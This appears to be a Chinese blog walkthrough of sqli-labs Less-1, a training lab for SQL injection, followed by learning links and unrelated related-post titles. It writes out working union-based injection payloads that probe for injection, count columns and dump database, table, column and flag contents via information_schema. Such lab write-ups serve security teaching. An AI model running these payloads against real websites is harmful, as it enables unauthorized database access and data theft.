sqli-labs (1)

sqli-labs实验前：

本人因在sqli-labs搭建过程中遇到大量问题，百度后依旧无果，所以现决定在在线sqli-labs平台进行试验。
sqli-labs在线平台: http://43.247.91.228:84/

在线平台sqli-labs Page-1 点击Less-1可直接进行试验

一.知识点

1.FireFox插件HackBar使用
2.字符型注入：注意单引号闭合
3.sqlmap这里暂时不使用，想了解的可以自己尝试，刚开始手工注入扎扎实实打基础较好。
4.字符型注入判断

（1）判断注入

?id=1' and 1=1 --+ 返回正确
?id=1' and 1=2 --+ 返回错误

（2）猜字段

?id=1' order by 2 --+ 返回正确
?id=1' order by 3 --+ 返回错误 得出字段数为 2下面为测试空格字符代替情况 （可跳过）?id=1' order by 2 -- - 返回正确
?id=1' order by 2 -- / 返回正确

（3）爆数据库名

?id=1' and 1=2 union select 1,database()--+

得到数据库sqli

（4）爆表名

?id=1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'--+

（5）爆列名

?id=1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'--+

（6）爆字段内容（flag）

?id=1' and 1=2 union select 1,group_concat(flag) from sqli.flag--+

二.题解

注：以下解题步骤大多以图片显示不再做过多解释

字段为3的时候显示正常，字段为4时显示错误，所以最终字段为3

数据库名为security

因为第二步爆出有3个字段，所以select后面要跟3个字段，下面这张图片为跟了两个字段时的情形会显示错误

爆出的表名有四个：emails,referers,uagents,users

上面四个表名中uagents,users两个表名最可疑，经过尝试在users表中得到了payload如下图

总结：字符型注入可以按照以上六步进行手工尝试最后得到payload

推荐：最后给大家推荐几个sql或者其他漏洞学习方面不错的网站
sql整数型/字符型注入: https://www.cnblogs.com/threesoil/p/12431496.html

ctf wiki: https://ctf-wiki.github.io/ctf-wiki/web/sqli-zh/

狼组知识库web方面: https://wiki.wgpsec.org/knowledge/web/

ctfhub sql注入wp: https://www.cnblogs.com/0yst3r-2046/p/12469632.html(最后这个是来自ctfhub学习中偶然看到的一位不认识的大佬，ta的ctf wp都挺详细的大家也可以多做学习)

在线sqli-labs 通关大全 Less-1相关推荐

1. SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注

   第27a关是双引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. 其他 SQLi LABS 靶场的解题步 ...

2. SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注

   第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...

3. SQLi LABS Less 26a 联合注入+布尔盲注

   第26a关是单引号+括号的字符型注入: 后台过滤了关键字( and  or ),注释(/*  #  --  /),空格: 这篇文章提供联合注入.布尔盲注.两种解题方式. SQLi LABS其他关卡可以 ...

4. SQLi LABS Less 25 联合注入+报错注入+布尔盲注

   第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...

5. 在线常用crontab表达式大全验证解析

   在线常用crontab表达式大全验证解析 在线常用crontab表达式大全验证解析 本工具可以在线模拟Crontab表达式的执行时间并且收集整理了常用的Crontab表达式. 本工具可以在线模拟Cro ...

6. 【git小游戏通关大全】

   前言: 最近为了弄懂git的使用和知识点,老师让我们在git小游戏Learn Git Branching多加练习,研究了好久游戏关总是突破不了,查看了很多资料和视频最终总结整理出一套完整的游戏闯关答案 ...

7. 在线播放器代码大全！

   在线播放器代码大全 1.avi格式 <object id="video" width="400" height="200" borde ...

8. sqli——labs初学者通关详

   目录 Less-1 GET-Error based-Single quotes-String(基于错误的GET单引号字符型注入) Less-2 GET-Error based- Intiger bas ...

9. 在线sqli-labs 通关大全 Less-2

   sqli-labs (2) 励志语录 青年是学习智慧的时期,中年是付诸实践的时期.--卢梭 1.知识点 sql注入常见参数 user():当前数据库用户 database():当前数据库名 conca ...

最新文章

1. Bootstrap框架的基本使用
2. Ubuntu使用小技巧
3. 腾讯面试：打家劫舍 III
4. 【VC基础】1、特性和分类
5. C#装箱和拆箱（值类型和引用类型之间的转换）
6. 看门狗寄存器c语言代码_「正点原子NANO STM32F103开发板资料连载」第十一章 看门狗实验...
7. boost::hana::detail模块实现相关算法的测试程序
8. java capacity_关于Java中StringBuffer的capacity问题
9. 如何通过map文件优化代码
10. Unit Testing with JUnit - Tutorial
11. mac 读写ntfs
12. html— Meta— http-equiv属性
13. python中pd是什么意思_何时申请(pd.to_numeric)以及何时在python中使用...
14. Android8 miui9使用,小米古董机刷完安卓8.0健步如飞！感觉比MIUI9还快
15. python学习实验报告（第一周）
16. npm install报错 npm ERR 的四种解决办法
17. 将福昕高级PDF编辑器中创建的PDF签名导出，迁移到其他电脑并导入福昕PDF中
18. Ubuntu16.04安装搜狗中文输入法1（安装完成后将英文输入法列为常用输入法，中文列为第二输入法）
19. SEO的外链与描文本该如何添加？
20. 求a100的值,an是一个集合{2^s+2^t且t＞s＞=0}程序验证

热门文章

1. 你还在手写接口文档？来，壹哥教你一招实现在线接口文档
2. BZOJ 4402: Claris的剑 （组合数学）
3. 关于小米游戏本显示屏时亮时暗的问题
4. Qt 仿QQ图片查看器
5. How Powerful are Graph Neural Networks？ GIN 图同构网络 ICLR 2019 论文详解
6. Android4.0 默认静、动态桌面设置
7. Console无界面程序如何使用SetTimer
8. Oracle获取insert的值,在Oracle中,如何从AFTER INSERT触发器获取插入的主键值?
9. php html5日期插件,基于jQuery和HTML5的日历时钟插件 的图文详解
10. 学习实战篇---通用卷积神经网络加速器的verilog实现（一）---axi-lite实验